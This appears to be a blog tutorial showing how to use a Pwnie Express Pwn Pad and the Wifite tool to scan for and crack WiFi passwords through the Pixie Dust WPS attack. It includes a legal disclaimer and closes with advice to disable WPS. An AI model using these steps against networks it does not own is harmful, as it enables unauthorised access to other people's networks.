Cracking WiFi with PwnieExpress Pwn Pad and Wifite

This tutorial is intended to demonstrate the use of the Pwnie Express Pwn Pad and the Wifite tool/script to find and crack WiFi Access Point passwords, especially those that have WPS (Wifi Protected Setup) capabilities. 

THE INSTRUCTIONS AND INFORMATION CONTAINED WITHIN THIS DOCUMENT/PAGE/TUTORIAL ARE FOR EDUCATIONAL PURPOSES ONLY.  EXECUTING THESE INSTRUCTIONS ON ANY SYSTEM(S) AND/OR NETWORKS THAT YOU DO NOT FULLY OWN AND CONTROL IS VERY LIKELY ILLEGAL WHEREVER YOU LIVE AND YOU WILL BE BREAKING THE LAW IF YOU DO SO. DON’T BREAK THE LAW.

To complete this tutorial, you will need the following:

SETUP

  1. Make sure your wireless network extender is connected to your wireless network and fully functional. The setup will depend on the make and model you purchased.
  2. Turn on the Pwn Pad first without the TP Link adapter.
  3. After the Pwn Pad starts, connect the TP Link adapter to the OTG USB cable as shown in the picture below.

    PWNIE-Back

  4. Once the Pwn Pad starts, you will be presented with a Home/Main screen similar to the one in the picture below.

    PWNIE-Home Screen

SCANNING

  1. From the Pwn Pad Main screen, tap the “Wireless Tools” group icon, and then tap the Wifite icon.

    Note: Make sure you have the TP-Link USB card connected to the Pwn Pad before you launch the Wifite tool.

    PWNIE-Wireless Tools

  2. The Wifite tool will verify that a compatible network card is connected and will launch in a terminal if it successfully finds one. As soon as it starts, you will see a splash screen similar to the picture below but it will quickly switch to show the WiFi Access Points it finds.

    PWNIE-Startup

  3. The picture below shows the WiFi access points that Wifite found. You can let it run for a few minutes and walk around the area if you need to get a better signal. The particular Access Point we will be trying to crack is the Marina-2.4 one (Others are greyed out to protect the neighbors’ privacy)

    PWNIE-Found Wireless

  4. When you’re ready to target the access point, you will need to send a CTRL+C signal to the running terminal. You can do so by first tapping anywhere in the terminal to bring up the keyboard, then, hold down your finger on the terminal to bring up a special Options Menu and tap to send the Control Key, then press C on the keyboard. Enter the number of the Access Point you want to target (listed under NUM column) and tap Enter on the keyboard. 

    Note: Although the keyboard itself has a CTRL key, it doesn’t seem to work. 

    PWNIE-Select Target

RESULTS

  1. Wifite will attempt several attacks to crack the Wifi password. For the Wifi Network Access Extenders I tested, they were cracked within seconds, regardless of the fact that the password used seems to be a “complex” password. 

    PWNIE-Found Password

  2. The attack method that seems to succeed the most is the Pixie attack, which is based on the Pixie Dust attack discovered in 2014 by Dominique Bongard. “The attack only works on the default WPS implementation of several wireless chip makers, including Ralink, MediaTek, Realtek and Broadcom… and focuses on a lack of randomization when generating the E-S1 and E-S2 “secret” nonces. If the attacker can figure out those two nonces, they can crack the PIN within one minute and 30 seconds, depending on the device.”
  3. Look up your device on Wikidevi. If your device contains one of the chipsets listed above, disable WPS now! If your device does not have the ability to disable WPS (such as WiFi Extenders), unplug and disconnect your device now!

References: 
https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup
https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)

Leave a Comment